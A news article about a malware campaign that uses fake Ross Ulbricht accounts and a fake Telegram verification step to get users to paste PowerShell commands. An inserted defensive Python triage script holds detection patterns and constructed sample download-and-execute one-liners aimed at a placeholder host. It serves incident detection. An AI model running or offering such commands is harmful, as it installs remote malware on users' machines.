Ross Ulbricht fake accounts used in new malware campaign
Ross Ulbricht, the controversial creator of the Silk Road, has long been at the center of discussions about the intersection between technology and criminal activity. Following a full pardon from US President Donald Trump, a new wave of cybercrime has emerged, taking advantage of news of the Ulbricht case to deliver malware to unsuspecting targets.
Capitalizing on the news coverage, threat actors on X redirect users to a Telegram channel where they are tricked into running PowerShell scripts that infect their devices with malware.
Ross Ulbricht’s malicious campaign
According to the latest findings of researchers at vx-underground, the attack uses a new variation of the popular “Click-Fix” tactic, but with a twist. Instead of disguising itself as a fix for a popular bug, this version pretends to be a CAPTCHA or verification process required to join a channel.
In this case, cybercriminals impersonate Ulbricht by using fake but verified accounts on X to lure users to Telegram channels that falsely claim to be official. Once on Telegram, users encounter a “Safeguard” identity verification scam, which leads them to an applet that creates a fake verification dialog and automatically copies a PowerShell command to their clipboard.
Users are then directed to run the command via the Windows Run dialog box. Running the command triggers a chain of events. First, it downloads a PowerShell script, which retrieves a ZIP file from http://openline[.]cyou. The ZIP file contains several files, including the identity file helper.exe, which is suspected to be a Cobalt Strike loader – a tool frequently used by attackers for remote access and for launching ransomware or data theft campaigns.
The entire process has been carefully crafted to avoid detection.
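From a defender's side, the chain described above leaves two artefacts on a Windows host that are worth checking after a suspected Click-Fix incident: the commands a user typed into the Run dialog, which Explorer records under the HKCU Explorer\RunMRU registry key (each value ending in a literal "\1"), and the script text captured by PowerShell script-block logging (event ID 4104). The following Python is an added example, not code from the article or from vx-underground: it scores constructed samples of both artefact types against indicators typical of a clipboard-pasted download-and-run one-liner (hidden window, execution-policy bypass, download cradle, inline execution, archive extraction, launching an executable from a temp folder) and flags entries above a threshold. The sample lines, the domain download.invalid and the weights and threshold are all constructed for the demonstration.

```python
"""Heuristic triage of Click-Fix-style PowerShell one-liners.

Added example (not the article's or vx-underground's code). Input is two
kinds of constructed artefacts: commands recorded in the RunMRU registry
key (Explorer appends "\\1" to each value) and PowerShell script-block text
as logged by event ID 4104. All sample lines below are made up.
"""
import re
from dataclasses import dataclass, field

# (name, case-insensitive regex, weight). Weights are a constructed judgement of
# how strongly a token suggests a paste-and-run download chain rather than
# ordinary administration; tune them to the environment.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), 2),
    ("policy_bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I), 2),
    ("encoded_command", re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    ("download_cradle", re.compile(
        r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|Start-BitsTransfer)\b", re.I), 2),
    ("inline_exec", re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I), 2),
    ("archive_unpack", re.compile(r"\bExpand-Archive\b", re.I), 1),
    ("url_present", re.compile(r"https?://[^\s'\"]+", re.I), 1),
    ("launch_exe_from_temp", re.compile(r"Start-Process\b.*(?:\$env:TEMP|\\Temp\\|\$env:APPDATA)", re.I), 1),
]


@dataclass
class Artefact:
    source: str                 # "RunMRU" or "ScriptBlock" (labels chosen for this demo)
    text: str
    hits: list = field(default_factory=list)
    score: int = 0


def parse_runmru(values):
    """Strip the trailing "\\1" that Explorer appends to every RunMRU value."""
    return [v[:-2] if v.endswith("\\1") else v for v in values]


def score_command(text):
    """Return (score, [indicator names]) for one command line."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def triage(artefacts, threshold=4):
    """Score every artefact in place and return those at or above the threshold."""
    flagged = []
    for a in artefacts:
        a.score, a.hits = score_command(a.text)
        # A suspicious PowerShell line typed into the Run dialog is exactly the
        # Click-Fix delivery path, so weight it a little higher.
        if a.source == "RunMRU" and a.score > 0:
            a.score += 1
            a.hits.append("typed_into_run_dialog")
        if a.score >= threshold:
            flagged.append(a)
    return flagged


# Constructed RunMRU values (as read from the registry, trailing "\1" included).
SAMPLE_RUNMRU = [
    r"notepad\1",
    r"cmd\1",
    r'powershell -w hidden -ep bypass -c "iwr http://download.invalid/stage1.ps1 | iex"\1',
]

# Constructed 4104 script-block texts: one benign, one download-unpack-run chain,
# one legitimate-looking download that should stay below the threshold.
SAMPLE_SCRIPTBLOCKS = [
    "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB",
    "Invoke-WebRequest http://download.invalid/pkg.zip -OutFile $env:TEMP\\pkg.zip; "
    "Expand-Archive $env:TEMP\\pkg.zip $env:TEMP\\pkg; Start-Process $env:TEMP\\pkg\\helper.exe",
    "Invoke-WebRequest https://www.powershellgallery.com/api/v2 -UseBasicParsing",
]


def build_sample_artefacts():
    arts = [Artefact("RunMRU", t) for t in parse_runmru(SAMPLE_RUNMRU)]
    arts += [Artefact("ScriptBlock", t) for t in SAMPLE_SCRIPTBLOCKS]
    return arts


def main():
    for a in triage(build_sample_artefacts()):
        print(f"[{a.source}] score={a.score} hits={','.join(a.hits)}\n    {a.text}")


if __name__ == "__main__":
    main()
```

On the constructed samples, the Run-dialog one-liner and the download-unpack-run script block are flagged, while the plain directory listing and the single Invoke-WebRequest against a package gallery fall below the threshold. In a real investigation the RunMRU values would be read from the user's registry hive and the script blocks from the Microsoft-Windows-PowerShell/Operational log, and any flagged entry would be pivoted on (parent process, network destination, files written under the temp folder) rather than treated as a verdict on its own.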
Ross Ulbricht released
This development comes after Ulbricht was pardoned and released this week after being imprisoned since 2013 on charges of founding and operating the popular dark web marketplace Silk Road.
Silk Road was an online marketplace on the Tor network that allowed people to trade illegal substances, such as drugs. Ulbricht operated the site using the alias “Dread Pirate Roberts”. The FBI arrested him in October 2013 and shut down the website.
In 2015, Ulbricht was convicted on charges including drug distribution and money laundering. He was sentenced to life in prison without the possibility of parole, and his appeals were rejected in 2017 and 2018.